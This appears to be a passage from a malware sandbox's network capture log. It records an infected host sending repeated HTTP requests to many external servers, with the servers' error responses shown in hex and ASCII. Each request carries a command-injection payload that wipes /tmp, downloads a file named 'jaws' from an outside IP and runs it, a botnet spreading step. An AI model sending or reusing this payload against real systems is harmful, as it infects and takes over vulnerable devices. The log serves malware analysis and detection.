                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            407192.168.2.23363222.187.2.18080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.863183022 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            408192.168.2.2334028154.95.217.17480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:19.891483068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            409192.168.2.2345462120.53.232.13780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:20.034063101 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:20.366066933 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:20 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            410192.168.2.235746694.255.246.23980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:20.289856911 CET395INHTTP/1.1 400 Bad Request
                                                            Server: micro_httpd
                                                            Cache-Control: no-cache
                                                            Date: Fri, 26 Jan 2024 16:31:35 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 61 61 61 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No aaa request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            411192.168.2.2334812192.252.184.9680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:20.331624031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.688225031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.149713039 CET321INHTTP/1.1 400 Bad Request
                                                            Server: FunCDN/2.0.4
                                                            Date: Fri, 26 Jan 2024 14:32:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 46 75 6e 43 44 4e 2f 32 2e 30 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>FunCDN/2.0.4</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            412192.168.2.235858275.101.206.19380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.492791891 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            413192.168.2.234151835.183.233.14480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.506382942 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            414192.168.2.2360650199.119.73.2180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.518955946 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.663487911 CET507INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:19:25 GMT
                                                            Server: Apache/2.4.38 (Debian)
                                                            Content-Length: 313
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6c 6f 75 64 2e 64 61 73 74 65 63 68 2d 69 6e 63 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at cloud.dastech-inc.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            415192.168.2.236078218.198.182.19880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.578212023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.779932022 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            416192.168.2.2339180108.156.251.23380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.585684061 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.794579983 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            417192.168.2.235078086.22.49.25380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.592092991 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            418192.168.2.234070693.63.84.18980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.603095055 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.829451084 CET210INHTTP/1.1 302 Object moved
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+
                                                            Content-Length: 74
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e
                                                            Data Ascii: <head><title>Object moved</title></head><body><h1>Object Moved</h1></body>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            419192.168.2.2348588104.68.14.17580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.661776066 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.946609974 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 66 66 32 33 37 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 31 26 23 34 36 3b 31 65 36 33 34 31 33 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;7ff23717&#46;1706279541&#46;1e634133</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            420192.168.2.2342420125.56.205.13580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.670697927 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.964544058 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 37 63 64 33 38 37 64 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 31 26 23 34 36 3b 32 35 66 32 63 62 35 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;87cd387d&#46;1706279541&#46;25f2cb53</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            421192.168.2.2345522120.53.232.13780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.724704981 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.072458982 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            422192.168.2.2358662148.251.126.8580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.791035891 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.996530056 CET501INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 307
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 6c 6f 75 64 2e 77 69 65 62 65 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at cloud.wiebe.org Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            423192.168.2.2360862195.42.149.6580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.792088985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.014031887 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:22 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            424192.168.2.2357594212.23.145.11480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.797564983 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.009968996 CET1286INHTTP/1.1 500 Internal Server Error
                                                            Content-Length: 38643
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 20 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 7d 20 68 31 2c 20 68 32 20 7b 20 68 65 69 67 68 74 3a 20 38 32 70 78 3b 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 20 2d 39 39 39 65 6d 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 20 64 69 76 20 7b 20 